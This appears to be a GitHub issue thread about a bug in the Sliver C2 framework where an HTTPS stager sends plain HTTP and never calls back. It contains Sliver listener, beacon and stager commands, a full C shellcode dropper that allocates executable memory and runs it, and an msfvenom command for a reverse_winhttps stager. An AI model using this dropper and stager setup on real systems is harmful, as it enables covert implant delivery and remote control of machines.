HTTPS Stager Requesting with HTTP Protocol - No Call Back

[An00bRektn]

Hi! I'm back again. After trying to get the stager to work after my previous post, I've been running into issues with just not receiving a callback whatsoever. My troubleshooting so far has led me to seeing that the stager is making a regular HTTP request to the HTTPS listener, which results in a "Bad Request" error.

I get a WerFault.exe on the Windows host that I'm testing on, but I feel like that's more to do with the fact that the stage 2 never gets downloaded as opposed to a genuine crash.

Steps to reproduce:

sliver > profiles new beacon --arch amd64 --os windows --mtls 10.10.69.24:443 -f shellcode --timeout 300 --seconds 5 --jitter 1 funnier_bytes
[*] Saved new implant profile (beacon) funnier_bytes

sliver > stage-listener --url https://10.10.69.24:8443 --profile funnier_bytes
[*] No builds found for profile funnier_bytes, generating a new one
[*] Job 1 (https) started

sliver > mtls --lhost 10.10.69.24 --lport 443
[*] Starting mTLS listener ...

sliver > 
[*] Successfully started job #2

sliver > generate stager -r https --lhost 10.10.69.24 --lport 8443
[*] Sliver implant stager saved to: /home/kali/Documents/sliver-test/KIND_TILE

Dropper:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

unsigned char payload[1353] = {
	// shellcode
};
unsigned int payload_len = sizeof(payload);

int main(void) {
	void * exec_mem;
	BOOL rv;
	HANDLE th;
        DWORD oldprotect = 0;
	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	RtlMoveMemory(exec_mem, payload, payload_len);
	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
	if ( rv != 0 ) {
			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
			WaitForSingleObject(th, -1);
	}
	return 0;
}

Sorry if this is better suited as an issue!

Edit: I've never gotten a stager to work properly with this framework before, so I tried it with HTTP to be absolutely sure, and by following the same steps but replacing every instance of MTLS/HTTPS with http did work and got a call back. I also noticed that in the shellcode, regardless of if it's HTTP or HTTPS, the URL is given as http://IP:PORT/STUFF, which might be part of the problem?

[moloch--]

When using MSF stagers you need to add --prepend-size to the stage-listener command:

stage-listener --prepend-size --url https://10.10.69.24:8443 --profile funnier_bytes

[An00bRektn]

Still didn't work, pretty much identical results as before :/
Also, although I'm sure the --prepend-size is the correct way to do things, didn't really seem necessary when I tried this over HTTP.

[rkervella]

It's a bug, we're using custom/reverse_winhttp in generate stager for both HTTP and HTTPS. We should use custom/reverse_winhttps for HTTPS. I'll fix it.

@An00bRektn in the meantime, you can use msfvenom to generate the stager shellcode using the following payload: windows/x64/custom/reverse_winhttps. Make sure to have the LURI ending in .woff (or whatever you set un the c2 config file):

msfvenom -p windows/x64/custom/reverse_winhttps LHOST=192.168.122.1 LPORT=1234 LURI=/hello.woff -f raw -o /tmp/stager.bin

[moloch--]

Fix should be merged #918

[ColeVan]

@An00bRektn are you able to post the msfvenom command you used to produce the shellcode that you placed in your dropper?